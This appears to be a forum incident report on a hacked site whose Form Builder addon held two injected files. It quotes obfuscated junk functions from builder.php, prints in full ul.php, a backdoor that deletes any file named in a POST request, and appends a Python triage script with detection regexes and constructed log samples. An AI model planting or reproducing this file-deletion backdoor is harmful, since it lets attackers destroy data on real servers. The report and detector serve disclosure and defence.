A client site has recently been hacked. The client is running version 2.0.11. Found the client was hacked through the Form Builder addon. There are 2 additional files that have been injected into the addons/form_builder directory.
What to look for:
builder.php - This file contained roughly 4,500 lines of encrypted function code, which looked like this:
```php
{
for($pa5=159;$pa5<7367;$pa5--){if($pa5!=17877) break;}
}
function b4ebd1a37d330fc77f229e42d57171a8c012769()
{
for($pa5=11;$pa5<12019;$pa5-=1){if($pa5!=30749) break;}
}
function b4ebd620c393876e21cecd4871c9d872eb0c0d60b()
{
for($pa5=139;$pa5<7803;$pa5--){if($pa5!=12933) break;}
}
function b4ebd4b77176337f5777f66468795f68071daebbe9ff7f7ba8d0dd2()
{
for($pa5=55;$pa5<26731;$pa5-=243){if($pa5!=1749) break;}
}
function b4ebd68349246a3d168342a39f378dc9d3951c4dacc1ad4eff77f7d7()
{
for($pa5=141;$pa5<7483;$pa5-=1){if($pa5!=23333) break;}
}
function b4ebd8ffd163e7f1e6f0f1c35f7b0f9cc6b0b9e9361e3c7af070()
{
}
function b4ebde83cb25a774bfdc00()
{
}
function b4ebdf4204fe69eff9034c18b84367eec75da71f7bc11472()
{
}
function b4ebdec3dcf77a377ced4d672e791db75fe702e213f0ee7ae()
{
```
The second file found was **ul.php**. This file had the following code:
```php
<?php
// Deletes whatever file the request names, relative to the application root.
// The path comes straight from $_POST and is never validated, so "../"
// sequences reach anything the web server user is allowed to unlink.
if (isset($_POST['link'])) {
    $app_dir = get_app_root_dir();
    @unlink($app_dir . $_POST['link']);   // "@" suppresses the PHP warning on failure
    if (file_exists($app_dir . $_POST['link']))
        echo "Failed!";
    else
        echo "Unlinked!";
}
//
// Walks up from the current directory (at most $max_deep levels) until it
// finds the directory containing config.local.php, i.e. the application root.
function get_app_root_dir($max_deep = 30)
{
    for ($i = 1; $i <= $max_deep; $i++)
    {
        $dir = getcwd();
        if (file_exists($dir . "/config.local.php"))
            return $dir . '/';
        chdir('../');
    }
    return false;
}
```
I recommend everyone check this addon for these files and remove the files immediately. I found this by combing through all recent traffic and found POST calls to the builder.php file coming from Eastern Bloc countries.
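Added example (mine, not part of the original post or of the Form Builder addon): a small triage script that turns the two indicators described above into offline checks. It flags PHP files in the addon directory that either are not in the addon's shipped file list or contain the junk `b4ebd...()` functions, the do-nothing `for(...){if(...) break;}` loops, or a request-driven `unlink()` like the one in ul.php, and it pulls POST requests to the addon's PHP files out of an access log. Assumptions, all for illustration: the regexes are derived only from the excerpts quoted in the post (a different obfuscator would need different patterns), the log is in Apache "combined" format, and every sample file and log line below is constructed, not real data.

```python
"""Triage helpers for the Form Builder compromise described above.
Added example, not the addon's code; regexes are based only on the
quoted builder.php / ul.php excerpts, samples are constructed."""
import re
from pathlib import Path

# --- indicators derived from the quoted builder.php and ul.php excerpts ----
# function b4ebd<hex>()  -- every junk function in the excerpt shares this prefix
OBFUSCATED_FUNC = re.compile(r"function\s+b4ebd[0-9a-f]{10,}\s*\(\s*\)")
# for($v=N;$v<N;$v--|-=N){if($v!=N) break;}  -- loop that always breaks at once
JUNK_LOOP = re.compile(
    r"for\(\$(\w+)=\d+;\$\1<\d+;\$\1(?:--|-=\d+)\)\{if\(\$\1!=\d+\)\s*break;\}")
# unlink() fed directly from request input, as in ul.php
REQUEST_UNLINK = re.compile(r"@?unlink\s*\([^;]*\$_(?:POST|GET|REQUEST)\[")
# the "walk up until config.local.php" trick ul.php uses to find the app root
DIR_WALK = re.compile(r"chdir\s*\(\s*['\"]\.\./?['\"]\s*\)")


def scan_php_source(src):
    """Count each indicator in one PHP file's text."""
    return {
        "obfuscated_funcs": len(OBFUSCATED_FUNC.findall(src)),
        "junk_loops": len(JUNK_LOOP.findall(src)),
        "request_unlink": REQUEST_UNLINK.search(src) is not None,
        "dir_walk": DIR_WALK.search(src) is not None,
    }


def is_suspicious(counts):
    # One request-driven unlink() or junk loop is enough; the junk function
    # names alone need several hits so a single odd name is not a finding.
    return (counts["request_unlink"] or counts["junk_loops"] > 0
            or counts["obfuscated_funcs"] >= 3)


def scan_addon_dir(addon_dir, shipped_files):
    """Return {relative path: counts} for every .php file under addon_dir that
    is suspicious or is not in the addon's shipped file list (assumed known)."""
    root = Path(addon_dir)
    findings = {}
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        counts = scan_php_source(path.read_text(errors="replace"))
        if rel not in shipped_files or is_suspicious(counts):
            findings[rel] = counts
    return findings


# --- access-log side: POSTs to PHP files inside the addon directory --------
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
ADDON_PHP = re.compile(r"/addons/form_builder/[^/?]+\.php")


def suspicious_requests(log_lines):
    """(ip, timestamp, path, status) for each POST hitting the addon's PHP.
    Real form submissions may POST there too, so review the sources."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and m["method"] == "POST" and ADDON_PHP.search(m["path"]):
            hits.append((m["ip"], m["ts"], m["path"], m["status"]))
    return hits


# --- constructed samples (not captured from a real site) -------------------
SAMPLE_BUILDER = r"""<?php
function b4ebd1a37d330fc77f229e42d57171a8c012769()
{
for($pa5=11;$pa5<12019;$pa5-=1){if($pa5!=30749) break;}
}
function b4ebd620c393876e21cecd4871c9d872eb0c0d60b()
{
for($pa5=139;$pa5<7803;$pa5--){if($pa5!=12933) break;}
}
function b4ebde83cb25a774bfdc00()
{
}
"""
SAMPLE_UL = r"""<?php
if (isset($_POST['link'])) {
$app_dir = get_app_root_dir();
@unlink($app_dir . $_POST['link']);
}
function get_app_root_dir($max_deep = 30)
{
for($i=1; $i<=$max_deep; $i++)
{
if( file_exists(getcwd() . "/config.local.php") ) return getcwd().'/';
chdir('../');
}
return false;
}
"""
SAMPLE_CLEAN = r"""<?php
function form_builder_render($fields) { return htmlspecialchars(implode(',', $fields)); }
"""
SAMPLE_LOG = [  # documentation-range IPs, constructed timestamps
    '203.0.113.45 - - [12/Mar/2013:03:14:07 +0000] "POST /addons/form_builder/builder.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2013:03:15:22 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [12/Mar/2013:03:16:01 +0000] "POST /addons/form_builder/ul.php HTTP/1.1" 200 9 "-" "curl/7.29.0"',
    '198.51.100.7 - - [12/Mar/2013:03:17:40 +0000] "GET /addons/form_builder/builder.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for name, src in (("builder.php", SAMPLE_BUILDER), ("ul.php", SAMPLE_UL), ("clean.php", SAMPLE_CLEAN)):
        c = scan_php_source(src)
        print(name, c, "SUSPICIOUS" if is_suspicious(c) else "ok")
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```

Run it against the real addon directory with `scan_addon_dir("addons/form_builder", shipped_files)` where `shipped_files` is the file list from a clean copy of the addon, and feed `suspicious_requests()` the web server's access log; any file it flags, or any source IP that only ever POSTs to builder.php or ul.php, is what to look at first. The junk-loop and `b4ebd` patterns are specific to this sample and will not catch a differently obfuscated payload, so treat the unexpected-file check as the primary one.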